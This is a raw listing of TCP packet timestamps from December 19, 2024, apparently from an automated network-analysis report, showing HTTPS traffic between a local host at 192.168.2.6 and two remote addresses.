                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.441772938 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.441772938 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.442982912 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.443056107 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.443097115 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.443114042 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.443164110 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.447925091 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.447948933 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.448014975 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.448025942 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.448110104 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.448110104 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449013948 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449031115 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449107885 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449117899 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449166059 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449733019 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449778080 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449825048 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449834108 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449867964 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.449909925 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454538107 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454574108 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454642057 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454653025 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454667091 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.454725981 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455708027 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455732107 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455770969 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455780029 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455813885 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455826998 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455833912 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455848932 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455897093 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455904007 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.455945969 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456445932 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456494093 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456562996 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456562996 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456572056 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.456640959 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461714029 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461741924 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461823940 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461823940 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461834908 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.461899042 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463054895 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463078976 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463159084 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463171005 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463340998 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463397980 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463413954 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463471889 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463490963 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.463537931 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464119911 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464179039 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464219093 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464227915 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464267015 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.464267015 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469783068 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469810009 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469855070 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469863892 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469896078 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.469913006 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470105886 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470133066 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470184088 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470192909 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470246077 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.470407009 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471501112 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471543074 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471573114 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471580982 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471616983 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.471627951 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472088099 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472131968 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472191095 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472198009 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472234011 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.472417116 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478055954 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478079081 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478128910 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478137970 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478177071 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478198051 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478440046 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478475094 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478499889 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478534937 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478579044 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478583097 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478586912 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478611946 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478614092 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478629112 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478651047 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478702068 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478702068 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478703022 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478712082 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478744030 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.478753090 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484462976 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484487057 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484555006 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484565020 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484600067 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.484610081 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.485841036 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.485857964 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.485951900 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.485961914 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486007929 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486243963 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486310005 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486337900 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486347914 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486388922 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.486388922 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487088919 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487114906 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487175941 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487188101 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487217903 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.487234116 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492013931 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492038965 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492139101 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492153883 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492247105 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492448092 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492465973 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492517948 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492527962 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492558956 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492569923 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492942095 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.492995024 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.493026018 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.493033886 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.493072033 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.493072033 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.494990110 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.495013952 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.495078087 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.495110989 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.495116949 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.495269060 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.499972105 CET49736443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.500015974 CET44349736162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.500101089 CET49736443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.500421047 CET49736443192.168.2.6162.125.69.15
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.500432014 CET44349736162.125.69.15192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502474070 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502502918 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502580881 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502587080 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502614021 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.502656937 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.510921001 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.510941982 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.511043072 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.511043072 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.511049986 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.511113882 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633831978 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633860111 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633863926 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633924007 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633950949 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.633990049 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.634035110 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.634048939 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.634072065 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.634073019 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.634099007 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.635071993 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.635114908 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.635183096 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.635196924 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.635253906 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640049934 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640074968 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640130997 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640139103 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640171051 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.640191078 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641227007 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641273975 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641299963 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641308069 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641355038 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641524076 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641560078 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641575098 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641645908 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641645908 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641654015 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.641710043 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646603107 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646668911 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646728992 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646739006 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646780014 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.646780014 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647480965 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647505999 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647557974 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647568941 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647600889 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.647617102 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648807049 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648822069 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648907900 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648916006 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648926020 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648945093 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648983955 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648988962 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.648997068 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.649029016 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.649087906 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.653861046 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.653907061 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654007912 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654007912 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654016972 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654216051 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654912949 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654937029 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.654999971 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655020952 CET44349726150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655050993 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655070066 CET49726443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655484915 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655500889 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655563116 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655575991 CET44349729150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.655628920 CET49729443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656418085 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656440020 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656531096 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656538963 CET44349728150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656554937 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.656598091 CET49728443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.661742926 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.661787033 CET44349727150.171.27.10192.168.2.6
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.661839008 CET49727443192.168.2.6150.171.27.10
                                                                                                                                                                                                                                                                  Dec 19, 2024 13:44:17.661845922 CET44349727150.171.27.10192.168.2.6
